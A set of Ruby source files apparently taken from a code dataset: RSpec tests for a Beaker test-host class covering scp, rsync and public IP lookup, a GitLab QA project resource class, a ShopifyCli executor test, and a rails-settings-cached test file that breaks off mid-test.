context 'do_scp_to' do
# it takes a location and a destination
# it basically proxies that to the connection object
it 'do_scp_to logs info and proxies to the connection' do
create_files(['source'])
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ '/source', 'target', {} ]
conn_args = args
expect( logger ).to receive(:trace)
expect( conn ).to receive(:scp_to).with( *conn_args ).and_return(Beaker::Result.new(host, 'output!'))
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.do_scp_to *args
end
it 'calls for host scp post operations after SCPing happens' do
create_files(['source'])
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ '/source', 'target', {} ]
conn_args = args
allow( logger ).to receive(:trace)
expect( conn ).to receive(:scp_to).ordered.with(
*conn_args
).and_return(Beaker::Result.new(host, 'output!'))
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
expect( host ).to receive( :scp_post_operations ).ordered
host.do_scp_to *args
end
it 'throws an IOError when the file given doesn\'t exist' do
expect { host.do_scp_to "/does/not/exist", "does/not/exist/over/there", {} }.to raise_error(IOError)
end
context "using an ignore array with an absolute source path" do
let( :source_path ) { '/repos/puppetlabs-inifile' }
let( :target_path ) { '/etc/puppetlabs/modules/inifile' }
before :each do
test_dir = "#{source_path}/tests"
other_test_dir = "#{source_path}/tests2"
files = [
'00_EnvSetup.rb', '035_StopFirewall.rb', '05_HieraSetup.rb',
'01_TestSetup.rb', '03_PuppetMasterSanity.rb',
'06_InstallModules.rb','02_PuppetUserAndGroup.rb',
'04_ValidateSignCert.rb', '07_InstallCACerts.rb' ]
@fileset1 = files.shuffle.map {|file| test_dir + '/' + file }
@fileset2 = files.shuffle.map {|file| other_test_dir + '/' + file }
create_files( @fileset1 )
create_files( @fileset2 )
end
it 'can take an ignore list that excludes all files and not call scp_to' do
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ source_path, target_path, {:ignore => ['tests', 'tests2']} ]
expect( logger ).to receive(:trace)
expect( host ).to receive( :mkdir_p ).exactly(0).times
expect( conn ).to receive(:scp_to).exactly(0).times
host.do_scp_to *args
end
it 'can take an ignore list that excludes a single file and scp the rest' do
created_target_path = File.join(target_path, File.basename(source_path))
exclude_file = '07_InstallCACerts.rb'
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ source_path, target_path, {:ignore => [exclude_file], :dry_run => false} ]
allow( Dir ).to receive( :glob ).and_return( @fileset1 + @fileset2 )
expect( logger ).to receive(:trace)
expect( host ).to receive( :mkdir_p ).with("#{created_target_path}/tests")
expect( host ).to receive( :mkdir_p ).with("#{created_target_path}/tests2")
(@fileset1 + @fileset2).each do |file|
if file !~ /#{exclude_file}/
file_args = [ file, File.join(created_target_path, File.dirname(file).gsub(source_path,'')), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to receive(:scp_to).with( *conn_args ).and_return(Beaker::Result.new(host, 'output!'))
else
file_args = [ file, File.join(created_target_path, File.dirname(file).gsub(source_path,'')), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to_not receive(:scp_to).with( *conn_args )
end
end
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.do_scp_to *args
end
end
context "using an ignore array with an absolute source path in host root" do
let( :source_path ) { '/puppetlabs-inifile' }
let( :target_path ) { '/etc/puppetlabs/modules/inifile' }
before :each do
test_dir = "#{source_path}/tests"
other_test_dir = "#{source_path}/tests/tests2"
another_test_dir = "#{source_path}/tests/tests3"
files = [
'00_EnvSetup.rb', '035_StopFirewall.rb', '05_HieraSetup.rb',
'01_TestSetup.rb', '03_PuppetMasterSanity.rb',
'06_InstallModules.rb','02_PuppetUserAndGroup.rb',
'04_ValidateSignCert.rb', '07_InstallCACerts.rb' ]
@fileset1 = files.shuffle.map {|file| test_dir + '/' + file }
@fileset2 = files.shuffle.map {|file| other_test_dir + '/' + file }
@fileset3 = files.shuffle.map {|file| another_test_dir + '/' + file }
create_files( @fileset1 )
create_files( @fileset2 )
create_files( @fileset3 )
end
it "should create target dirs with correct path seperator" do
create_files(['source'])
exclude_file = '04_ValidateSignCert.rb'
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ source_path, target_path, {:ignore => [exclude_file]} ]
conn_args = args
allow( Dir ).to receive( :glob ).and_return( @fileset1 + @fileset2 + @fileset3)
created_target_path = File.join(target_path, File.basename(source_path))
expect( host ).to receive( :mkdir_p ).with("#{created_target_path}/tests")
expect( host ).to receive( :mkdir_p ).with("#{created_target_path}/tests/tests2")
expect( host ).to receive( :mkdir_p ).with("#{created_target_path}/tests/tests3")
(@fileset1 + @fileset2 + @fileset3).each do |file|
if file !~ /#{exclude_file}/
file_args = [ file, File.join(created_target_path, File.dirname(file).gsub(source_path,'')), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to receive(:scp_to).with( *conn_args ).and_return(Beaker::Result.new(host, 'output!'))
else
file_args = [ file, File.join(created_target_path, File.dirname(file).gsub(source_path,'')), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to_not receive(:scp_to).with( *conn_args )
end
end
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.do_scp_to *args
end
end
context "using an ignore array" do
before :each do
test_dir = 'tmp/tests'
other_test_dir = 'tmp/tests2'
files = [
'00_EnvSetup.rb', '035_StopFirewall.rb', '05_HieraSetup.rb',
'01_TestSetup.rb', '03_PuppetMasterSanity.rb',
'06_InstallModules.rb','02_PuppetUserAndGroup.rb',
'04_ValidateSignCert.rb', '07_InstallCACerts.rb' ]
@fileset1 = files.shuffle.map {|file| test_dir + '/' + file }
@fileset2 = files.shuffle.map {|file| other_test_dir + '/' + file }
create_files( @fileset1 )
create_files( @fileset2 )
end
it 'can take an ignore list that excludes all files and not call scp_to' do
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ 'tmp', 'target', {:ignore => ['tests', 'tests2']} ]
expect( logger ).to receive(:trace)
expect( host ).to receive( :mkdir_p ).exactly(0).times
expect( conn ).to receive(:scp_to).exactly(0).times
host.do_scp_to *args
end
it 'can take an ignore list that excludes a single file and scp the rest' do
exclude_file = '07_InstallCACerts.rb'
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ 'tmp', 'target', {:ignore => [exclude_file], :dry_run => false} ]
allow( Dir ).to receive( :glob ).and_return( @fileset1 + @fileset2 )
expect( logger ).to receive(:trace)
expect( host ).to receive( :mkdir_p ).with('target/tmp/tests')
expect( host ).to receive( :mkdir_p ).with('target/tmp/tests2')
(@fileset1 + @fileset2).each do |file|
if file !~ /#{exclude_file}/
file_args = [ file, File.join('target', File.dirname(file)), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to receive(:scp_to).with( *conn_args ).and_return(Beaker::Result.new(host, 'output!'))
else
file_args = [ file, File.join('target', File.dirname(file)), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to_not receive(:scp_to).with( *conn_args )
end
end
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.do_scp_to *args
end
it 'can take an ignore list that excludes a dir and scp the rest' do
exclude_file = 'tests'
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ 'tmp', 'target', {:ignore => [exclude_file], :dry_run => false} ]
allow( Dir ).to receive( :glob ).and_return( @fileset1 + @fileset2 )
expect( logger ).to receive(:trace)
expect( host ).to_not receive( :mkdir_p ).with('target/tmp/tests')
expect( host ).to receive( :mkdir_p ).with('target/tmp/tests2')
(@fileset1).each do |file|
file_args = [ file, File.join('target', File.dirname(file)), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to_not receive(:scp_to).with( *conn_args )
end
(@fileset2).each do |file|
file_args = [ file, File.join('target', File.dirname(file)), {:ignore => [exclude_file], :dry_run => false} ]
conn_args = file_args
expect( conn ).to receive(:scp_to).with( *conn_args ).and_return(Beaker::Result.new(host, 'output!'))
end
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.do_scp_to *args
end
end
end
context 'do_scp_from' do
it 'do_scp_from logs info and proxies to the connection' do
logger = host[:logger]
conn = double(:connection)
@options = { :logger => logger }
host.instance_variable_set :@connection, conn
args = [ 'source', 'target', {} ]
conn_args = args
expect( logger ).to receive(:debug)
expect( conn ).to receive(:scp_from).with( *conn_args ).and_return(Beaker::Result.new(host, 'output!'))
allow( conn ).to receive(:ip).and_return(host['ip'])
allow( conn ).to receive(:vmhostname).and_return(host['vmhostname'])
allow( conn ).to receive(:hostname).and_return(host.name)
host.do_scp_from *args
end
end
context 'do_rsync_to' do
it 'do_rsync_to logs info and call Rsync class' do
create_files(['source'])
logger = host[:logger]
@options = { :logger => logger }
args = [ 'source', 'target', {:ignore => ['.bundle']} ]
key = host['ssh']['keys'].first
expect( File ).to receive( :exist? ).with( key ).and_return true
rsync_args = [ 'source', 'target', ['-az', "-e \"ssh -i #{key} -p 22 -o 'StrictHostKeyChecking no'\"", "--exclude '.bundle'"] ]
expect( host ).to receive(:reachable_name).and_return('default.ip.address')
expect( Rsync ).to receive(:run).with( *rsync_args ).and_return(Rsync::Result.new('raw rsync output', 0))
host.do_rsync_to *args
expect(Rsync.host).to eq('[email protected]')
end
it 'throws an IOError when the file given doesn\'t exist' do
expect { host.do_rsync_to "/does/not/exist", "does/not/exist/over/there", {} }.to raise_error(IOError)
end
it 'uses the ssh config file' do
@options = {'ssh' => {:config => '/var/folders/v0/centos-64-x6420150625-48025-lu3u86'}}
create_files(['source'])
args = [ 'source', 'target',
{:ignore => ['.bundle']} ]
# since were using fakefs we need to create the file and directories
FileUtils.mkdir_p('/var/folders/v0/')
FileUtils.touch('/var/folders/v0/centos-64-x6420150625-48025-lu3u86')
rsync_args = [ 'source', 'target', ['-az', "-e \"ssh -F /var/folders/v0/centos-64-x6420150625-48025-lu3u86 -o 'StrictHostKeyChecking no'\"", "--exclude '.bundle'"] ]
expect(Rsync).to receive(:run).with(*rsync_args).and_return(Rsync::Result.new('raw rsync output', 0))
expect(host.do_rsync_to(*args).success?).to eq(true)
end
it 'does not use the ssh config file when config does not exist' do
@options = {'ssh' => {:config => '/var/folders/v0/centos-64-x6420150625-48025-lu3u86'}}
create_files(['source'])
args = [ 'source', 'target',
{:ignore => ['.bundle']} ]
rsync_args = [ 'source', 'target', ['-az', "-e \"ssh -o 'StrictHostKeyChecking no'\"", "--exclude '.bundle'"] ]
expect(Rsync).to receive(:run).with(*rsync_args).and_return(Rsync::Result.new('raw rsync output', 0))
expect(host.do_rsync_to(*args).success?).to eq(true)
end
it "doesn't corrupt :ignore option" do
create_files(['source'])
ignore_list = ['.bundle']
args = ['source', 'target', {:ignore => ignore_list}]
key = host['ssh']['keys'].first
expect( File ).to receive( :exist? ).with( key ).twice.and_return true
rsync_args = ['source', 'target', ['-az', "-e \"ssh -i #{key} -p 22 -o 'StrictHostKeyChecking no'\"", "--exclude '.bundle'"]]
expect(Rsync).to receive(:run).twice.with(*rsync_args).and_return(Rsync::Result.new('raw rsync output', 0))
host.do_rsync_to *args
host.do_rsync_to *args
end
end
it 'interpolates to its "name"' do
expect( "#{host}" ).to be === 'name'
end
describe 'host close' do
context 'with a nil connection object' do
before do
conn = nil
host.instance_variable_set :@connection, conn
allow(host).to receive(:close).and_call_original
end
it 'does not raise an error' do
expect { host.close }.to_not raise_error
end
end
end
describe '#get_public_ip' do
let (:aws) { double('AWSmock')}
it 'calls upon the ec2 instance to get the ip address' do
host.host_hash[:hypervisor] = 'ec2'
host.host_hash[:instance] = aws
expect(aws).to receive(:ip_address)
host.get_public_ip
end
it 'call upon openstack host to get the ip address' do
host.host_hash[:hypervisor] = 'openstack'
expect(host.get_public_ip).to be(host.host_hash[:ip])
end
it 'returns nil when no matching hypervisor is found' do
host.host_hash[:hypervisor] = 'vmpooler'
expect(host.get_public_ip).to be(nil)
end
it 'calls execute with curl if the host_hash[:instance] is not defined for ec2 and the host is not an instance of Windows::Host' do
host.host_hash[:hypervisor] = 'ec2'
host.host_hash[:instance] = nil
expect(host).to receive(:instance_of?).with(Windows::Host).and_return(false)
expect(host).to receive(:execute).with("curl http://169.254.169.254/latest/meta-data/public-ipv4").and_return('127.0.0.1')
host.get_public_ip
end
it 'calls execute with wget if the host_hash[:instance] is not defined for ec2 and the host is an instance of Windows::Host' do
host.host_hash[:hypervisor] = 'ec2'
host.host_hash[:instance] = nil
expect(host).to receive(:instance_of?).with(Windows::Host).and_return(true)
expect(host).to receive(:execute).with("wget http://169.254.169.254/latest/meta-data/public-ipv4").and_return('127.0.0.1')
host.get_public_ip
end
it 'calls execute with curl if the host_hash[:ip] is not defined for openstack and the host is not an instance of Windows::Host' do
host.host_hash[:hypervisor] = 'openstack'
host.host_hash[:ip] = nil
expect(host).to receive(:instance_of?).with(Windows::Host).and_return(false)
expect(host).to receive(:execute).with("curl http://169.254.169.254/latest/meta-data/public-ipv4").and_return('127.0.0.1')
host.get_public_ip
end
it 'calls execute with wget if the host_hash[:ip] is not defined for openstack and the host is an instance of Windows::Host' do
host.host_hash[:hypervisor] = 'openstack'
host.host_hash[:ip] = nil
expect(host).to receive(:instance_of?).with(Windows::Host).and_return(true)
expect(host).to receive(:execute).with("wget http://169.254.169.254/latest/meta-data/public-ipv4").and_return('127.0.0.1')
host.get_public_ip
end
end
describe '#ip' do
it 'calls #get_ip when get_public_ip returns nil' do
allow( host ).to receive(:get_public_ip).and_return(nil)
expect(host).to receive(:get_ip).and_return('127.0.0.2')
expect(host.ip).to eq('127.0.0.2')
end
it 'does not call get_ip when #get_public_ip returns an address' do
allow( host ).to receive(:get_public_ip).and_return('127.0.0.1')
expect(host).to_not receive(:get_ip)
expect(host.ip).to eq('127.0.0.1')
end
end
describe "#wait_for_port" do
it 'returns true when port is open' do
allow(host).to receive(:repeat_fibonacci_style_for).and_return(true)
expect(host.wait_for_port(22, 0)).to be true
end
it 'returns false when port is not open' do
allow(host).to receive(:repeat_fibonacci_style_for).and_return(false)
expect(host.wait_for_port(22, 0)).to be false
end
end
describe "#fips_mode?" do
it 'returns false on non-el7 hosts' do
@platform = 'windows'
expect(host.fips_mode?).to be false
end
it 'returns true when the `fips_enabled` file is present and contains "1"' do
@platform = 'el-7'
expect(host).to receive(:execute).with("cat /proc/sys/crypto/fips_enabled").and_return("1")
expect(host.fips_mode?).to be true
end
it 'returns false when the `fips_enabled` file is present and contains "0"' do
@platform = 'el-7'
expect(host).to receive(:execute).with("cat /proc/sys/crypto/fips_enabled").and_return("0")
expect(host.fips_mode?).to be false
end
end
end
end
| 40.747642 | 173 | 0.605574 |
28d0844e71cac82934d8a78013e12331d12c0497 | 8,162 | # frozen_string_literal: true
require 'securerandom'
module QA
module Resource
class Project < Base
include Events::Project
include Members
include Visibility
attr_accessor :repository_storage # requires admin access
attr_writer :initialize_with_readme
attr_writer :auto_devops_enabled
attr_writer :github_personal_access_token
attr_writer :github_repository_path
attribute :id
attribute :name
attribute :add_name_uuid
attribute :description
attribute :standalone
attribute :runners_token
attribute :visibility
attribute :template_name
attribute :import
attribute :group do
Group.fabricate!
end
attribute :path_with_namespace do
"#{sandbox_path}#{group.path}/#{name}" if group
end
alias_method :full_path, :path_with_namespace
def sandbox_path
group.respond_to?('sandbox') ? "#{group.sandbox.path}/" : ''
end
attribute :repository_ssh_location do
Page::Project::Show.perform do |show|
show.repository_clone_ssh_location
end
end
attribute :repository_http_location do
Page::Project::Show.perform do |show|
show.repository_clone_http_location
end
end
def initialize
@add_name_uuid = true
@standalone = false
@description = 'My awesome project'
@initialize_with_readme = false
@auto_devops_enabled = false
@visibility = :public
@template_name = nil
@import = false
self.name = "the_awesome_project"
end
def name=(raw_name)
@name = @add_name_uuid ? "#{raw_name}-#{SecureRandom.hex(8)}" : raw_name
end
def fabricate!
return if @import
unless @standalone
group.visit!
Page::Group::Show.perform(&:go_to_new_project)
end
if @template_name
QA::Flow::Project.go_to_create_project_from_template
Page::Project::New.perform do |new_page|
new_page.use_template_for_project(@template_name)
end
end
Page::Project::NewExperiment.perform(&:click_blank_project_link) if Page::Project::NewExperiment.perform(&:shown?)
Page::Project::New.perform do |new_page|
new_page.choose_test_namespace
new_page.choose_name(@name)
new_page.add_description(@description)
new_page.set_visibility(@visibility)
new_page.enable_initialize_with_readme if @initialize_with_readme
new_page.create_new_project
end
end
def fabricate_via_api!
resource_web_url(api_get)
rescue ResourceNotFoundError
super
end
def has_file?(file_path)
response = repository_tree
raise ResourceNotFoundError, "#{response[:message]}" if response.is_a?(Hash) && response.has_key?(:message)
response.any? { |file| file[:path] == file_path }
end
def has_branch?(branch)
has_branches?(Array(branch))
end
def has_branches?(branches)
branches.all? do |branch|
response = get(Runtime::API::Request.new(api_client, "#{api_repository_branches_path}/#{branch}").url)
response.code == HTTP_STATUS_OK
end
end
def has_tags?(tags)
tags.all? do |tag|
response = get(Runtime::API::Request.new(api_client, "#{api_repository_tags_path}/#{tag}").url)
response.code == HTTP_STATUS_OK
end
end
def api_get_path
"/projects/#{CGI.escape(path_with_namespace)}"
end
def api_visibility_path
"/projects/#{id}"
end
def api_get_archive_path(type = 'tar.gz')
"#{api_get_path}/repository/archive.#{type}"
end
def api_members_path
"#{api_get_path}/members"
end
def api_merge_requests_path
"#{api_get_path}/merge_requests"
end
def api_runners_path
"#{api_get_path}/runners"
end
def api_commits_path
"#{api_get_path}/repository/commits"
end
def api_repository_branches_path
"#{api_get_path}/repository/branches"
end
def api_repository_tags_path
"#{api_get_path}/repository/tags"
end
def api_repository_tree_path
"#{api_get_path}/repository/tree"
end
def api_pipelines_path
"#{api_get_path}/pipelines"
end
def api_put_path
"/projects/#{id}"
end
def api_post_path
'/projects'
end
def api_post_body
post_body = {
name: name,
description: description,
visibility: @visibility,
initialize_with_readme: @initialize_with_readme,
auto_devops_enabled: @auto_devops_enabled
}
unless @standalone
post_body[:namespace_id] = group.id
post_body[:path] = name
end
post_body[:repository_storage] = repository_storage if repository_storage
post_body[:template_name] = @template_name if @template_name
post_body
end
def api_delete_path
"/projects/#{id}"
end
def change_repository_storage(new_storage)
put_body = { repository_storage: new_storage }
response = put Runtime::API::Request.new(api_client, api_put_path).url, put_body
unless response.code == HTTP_STATUS_OK
raise ResourceUpdateFailedError, "Could not change repository storage to #{new_storage}. Request returned (#{response.code}): `#{response}`."
end
wait_until(sleep_interval: 1) { Runtime::API::RepositoryStorageMoves.has_status?(self, 'finished', new_storage) }
rescue Support::Repeater::RepeaterConditionExceededError
raise Runtime::API::RepositoryStorageMoves::RepositoryStorageMovesError, 'Timed out while waiting for the repository storage move to finish'
end
def commits
parse_body(get(Runtime::API::Request.new(api_client, api_commits_path).url))
end
def default_branch
reload!.api_response[:default_branch] || Runtime::Env.default_branch
end
def import_status
response = get Runtime::API::Request.new(api_client, "/projects/#{id}/import").url
unless response.code == HTTP_STATUS_OK
raise ResourceQueryError, "Could not get import status. Request returned (#{response.code}): `#{response}`."
end
result = parse_body(response)
Runtime::Logger.error("Import failed: #{result[:import_error]}") if result[:import_status] == "failed"
result[:import_status]
end
def merge_requests
parse_body(get(Runtime::API::Request.new(api_client, api_merge_requests_path).url))
end
def merge_request_with_title(title)
merge_requests.find { |mr| mr[:title] == title }
end
def runners(tag_list: nil)
response = if tag_list
get Runtime::API::Request.new(api_client, "#{api_runners_path}?tag_list=#{tag_list.compact.join(',')}").url
else
get Runtime::API::Request.new(api_client, "#{api_runners_path}").url
end
parse_body(response)
end
def repository_branches
parse_body(get(Runtime::API::Request.new(api_client, api_repository_branches_path).url))
end
def repository_tags
parse_body(get(Runtime::API::Request.new(api_client, api_repository_tags_path).url))
end
def repository_tree
parse_body(get(Runtime::API::Request.new(api_client, api_repository_tree_path).url))
end
def pipelines
parse_body(get(Runtime::API::Request.new(api_client, api_pipelines_path).url))
end
private
def transform_api_resource(api_resource)
api_resource[:repository_ssh_location] =
Git::Location.new(api_resource[:ssh_url_to_repo])
api_resource[:repository_http_location] =
Git::Location.new(api_resource[:http_url_to_repo])
api_resource
end
end
end
end
| 28.439024 | 151 | 0.640039 |
629bdb467e4c322ca8a9ca4a5b49e6aacab80c12 | 2,053 | require 'test_helper'
module ShopifyCli
module Core
class ExecutorTest < MiniTest::Test
include TestHelpers::FakeTask
class FakeCommand < ShopifyCli::Command
prerequisite_task :fake
class FakeSubCommand < ShopifyCli::SubCommand
prerequisite_task :fake
def call(*)
@ctx.puts('subcommand!')
end
end
subcommand :FakeSubCommand, 'fakesub'
options do |parser, flags|
parser.on('-v', '--verbose', 'print verbosely') do |v|
flags[:verbose] = v
end
end
def call(_args, _name)
if options.flags[:verbose]
@ctx.puts('verbose!')
else
@ctx.puts('command!')
end
end
end
def setup
@log = Tempfile.new
super
end
def test_prerequisite_task
executor = ShopifyCli::Core::Executor.new(@context, @registry, log_file: @log)
reg = CLI::Kit::CommandRegistry.new(default: nil, contextual_resolver: nil)
reg.add(FakeCommand, :fake)
@context.expects(:puts).with('success!')
@context.expects(:puts).with('command!')
executor.call(FakeCommand, 'fake', [])
end
def test_options
executor = ShopifyCli::Core::Executor.new(@context, @registry, log_file: @log)
reg = CLI::Kit::CommandRegistry.new(default: nil, contextual_resolver: nil)
reg.add(FakeCommand, :fake)
@context.expects(:puts).with('success!')
@context.expects(:puts).with('verbose!')
executor.call(FakeCommand, 'fake', ['-v'])
end
def test_subcommand
executor = ShopifyCli::Core::Executor.new(@context, @registry, log_file: @log)
reg = CLI::Kit::CommandRegistry.new(default: nil, contextual_resolver: nil)
reg.add(FakeCommand, :fake)
@context.expects(:puts).with('success!')
@context.expects(:puts).with('subcommand!')
executor.call(FakeCommand, 'fake', ['fakesub'])
end
end
end
end
| 29.328571 | 86 | 0.59133 |
610e1c095567d90162ed3ddb75e22f2bfd79ff49 | 12,841 | # frozen_string_literal: true
require "test_helper"
# rubocop:disable Lint/ConstantDefinitionInBlock
class BaseTest < ActiveSupport::TestCase
def find_value(var_name)
Setting.where(var: var_name).take
end
def direct_update_record(var, value)
record = find_value(var) || Setting.new(var: var)
record[:value] = YAML.dump(value)
record.save!(validate: false)
end
def assert_no_record(var)
record = find_value(:admin_emails)
assert_nil record, message: "#{var} should not have database record."
end
def assert_record_value(var, val)
record = find_value(var)
assert_not_nil record
assert_equal val.to_yaml, record[:value]
assert_equal val, record.value
end
test "define setting with protected keys" do
assert_raise(RailsSettings::ProcetedKeyError, "Can't use var as setting key.") do
class NewSetting < RailsSettings::Base
field :var
end
end
assert_raise(RailsSettings::ProcetedKeyError, "Can't use value as setting key.") do
class NewSetting < RailsSettings::Base
field :value
end
end
end
test "cache_prefix and cache_key" do
assert_equal "rails-settings-cached/v1", Setting.cache_key
Setting.cache_prefix { "v2" }
assert_equal "rails-settings-cached/v2", Setting.cache_key
end
test "all_settings" do
assert_equal({}, Setting.send(:_all_settings))
end
test "setting_keys" do
assert_equal 15, Setting.keys.size
assert_includes(Setting.keys, "host")
assert_includes(Setting.keys, "readonly_item")
assert_includes(Setting.keys, "default_tags")
assert_includes(Setting.keys, "omniauth_google_options")
assert_equal 12, Setting.editable_keys.size
assert_includes(Setting.editable_keys, "host")
assert_includes(Setting.editable_keys, "default_tags")
assert_equal 3, Setting.readonly_keys.size
assert_includes(Setting.readonly_keys, "readonly_item")
assert_includes(Setting.readonly_keys, "readonly_item_with_proc")
assert_includes(Setting.readonly_keys, "omniauth_google_options")
end
test "get_field" do
assert_equal({}, Setting.get_field("foooo"))
assert_equal(
{scope: :application, key: "host", default: "http://example.com", type: :string, readonly: false, options: {}},
Setting.get_field("host")
)
assert_equal(
{scope: :omniauth, key: "omniauth_google_options", default: {client_id: "the-client-id", client_secret: "the-client-secret"}, type: :hash, readonly: true, options: {}},
Setting.get_field("omniauth_google_options")
)
end
test "defined_fields and scope" do
scopes = Setting.defined_fields.select { |field| !field[:readonly] }.group_by { |field| field[:scope] || :none }
# assert_equal 2, groups.length
assert_equal %i[application contents mailer none], scopes.keys
assert_equal 4, scopes[:application].length
assert_equal 5, scopes[:contents].length
assert_equal 2, scopes[:mailer].length
end
test "not exist field" do
assert_raise(NoMethodError) { Setting.not_exist_method }
end
test "readonly field" do
assert_equal 100, Setting.readonly_item
assert_raise(NoMethodError) { Setting.readonly_item = 1 }
assert_equal 103, Setting.readonly_item_with_proc
assert_kind_of Hash, Setting.omniauth_google_options
assert_equal "the-client-id", Setting.omniauth_google_options[:client_id]
assert_equal "the-client-secret", Setting.omniauth_google_options[:client_secret]
assert_raise(NoMethodError) { Setting.omniauth_google_options = {foo: 1} }
end
test "instance method get field" do
setting = Setting.new
assert_equal Setting.host, setting.host
assert_equal Setting.default_tags, setting.default_tags
assert_equal Setting.readonly_item, setting.readonly_item
assert_equal 103, setting.readonly_item_with_proc
end
test "value serialize" do
assert_equal 1, Setting.user_limits
Setting.user_limits = 12
assert_equal 12, Setting.user_limits
assert_record_value :user_limits, 12
end
test "string field" do
assert_equal "http://example.com", Setting.host
Setting.host = "https://www.example.com"
assert_equal "https://www.example.com", Setting.host
Setting.host = "https://www.rubyonrails.org"
assert_equal "https://www.rubyonrails.org", Setting.host
end
test "integer field" do
assert_equal 1, Setting.user_limits
assert_instance_of Integer, Setting.user_limits
assert_no_record :user_limits
Setting.user_limits = 12
assert_equal 12, Setting.user_limits
assert_instance_of Integer, Setting.user_limits
assert_record_value :user_limits, 12
Setting.user_limits = "27"
assert_equal 27, Setting.user_limits
assert_instance_of Integer, Setting.user_limits
assert_record_value :user_limits, 27
Setting.user_limits = 2.7
assert_equal 2, Setting.user_limits
assert_instance_of Integer, Setting.user_limits
assert_record_value :user_limits, 2
assert_equal 2, Setting.default_value_with_block
Setting.default_value_with_block = 100
assert_equal 100, Setting.default_value_with_block
end
test "float field" do
assert_equal 7, Setting.float_item
assert_instance_of Float, Setting.float_item
assert_no_record :float_item
Setting.float_item = 9
assert_equal 9, Setting.float_item
assert_instance_of Float, Setting.float_item
assert_record_value :float_item, 9.to_f
Setting.float_item = 2.9
assert_equal 2.9, Setting.float_item
assert_instance_of Float, Setting.float_item
assert_record_value :float_item, 2.9
Setting.float_item = "2.9"
assert_equal 2.9, Setting.float_item
assert_instance_of Float, Setting.float_item
assert_record_value :float_item, "2.9".to_f
end
test "big decimal field" do
assert_equal 9, Setting.big_decimal_item
assert_instance_of BigDecimal, Setting.big_decimal_item
assert_no_record :big_decimal_item
Setting.big_decimal_item = 7
assert_equal 7, Setting.big_decimal_item
assert_instance_of BigDecimal, Setting.big_decimal_item
assert_record_value :big_decimal_item, 7.to_d
Setting.big_decimal_item = 2.9
assert_equal 2.9, Setting.big_decimal_item
assert_instance_of BigDecimal, Setting.big_decimal_item
assert_record_value :big_decimal_item, 2.9.to_d
Setting.big_decimal_item = "2.9"
assert_equal 2.9, Setting.big_decimal_item
assert_instance_of BigDecimal, Setting.big_decimal_item
assert_record_value :big_decimal_item, "2.9".to_d
end
test "array field" do
assert_equal %w[[email protected]], Setting.admin_emails
assert_no_record :admin_emails
new_emails = %w[[email protected] [email protected]]
Setting.admin_emails = new_emails
assert_equal new_emails, Setting.admin_emails
assert_record_value :admin_emails, new_emails
Setting.admin_emails = new_emails.join("\n")
assert_equal new_emails, Setting.admin_emails
assert_record_value :admin_emails, new_emails
Setting.admin_emails = new_emails.join(",")
assert_equal new_emails, Setting.admin_emails
assert_record_value :admin_emails, new_emails
Setting.admin_emails = new_emails.join(";")
assert_equal new_emails, Setting.admin_emails
assert_record_value :admin_emails, new_emails
Setting.admin_emails = new_emails.join(" , ")
assert_equal new_emails, Setting.admin_emails
assert_record_value :admin_emails, new_emails
end
test "hash field" do
default_value = {
host: "foo.com",
username: "[email protected]",
password: "123456"
}
assert_equal default_value, Setting.smtp_settings
assert_no_record :smtp_settings
# sym keys
new_value = {
title: "123",
name: "456"
}
Setting.smtp_settings = new_value
record = find_value(:smtp_settings)
assert_equal new_value.deep_stringify_keys, Setting.smtp_settings
assert_record_value :smtp_settings, new_value
# string keys
new_value = {
"title" => "456",
"age" => 32,
"name" => "Jason Lee"
}
Setting.smtp_settings = new_value
assert_equal new_value.deep_stringify_keys, Setting.smtp_settings
assert_equal "456", Setting.smtp_settings[:title]
assert_equal "456", Setting.smtp_settings["title"]
assert_equal 32, Setting.smtp_settings[:age]
assert_equal 32, Setting.smtp_settings["age"]
assert_equal "Jason Lee", Setting.smtp_settings[:name]
assert_equal "Jason Lee", Setting.smtp_settings["name"]
assert_record_value :smtp_settings, new_value
# JSON key
new_value = {
"sym" => :symbol,
"str" => "string",
"num" => 27.72,
"float" => 9.to_f,
"big_decimal" => 2.9.to_d
}
Setting.smtp_settings = new_value
assert_equal new_value.deep_stringify_keys, Setting.smtp_settings
assert_equal :symbol, Setting.smtp_settings[:sym]
assert_equal :symbol, Setting.smtp_settings["sym"]
assert_equal "string", Setting.smtp_settings["str"]
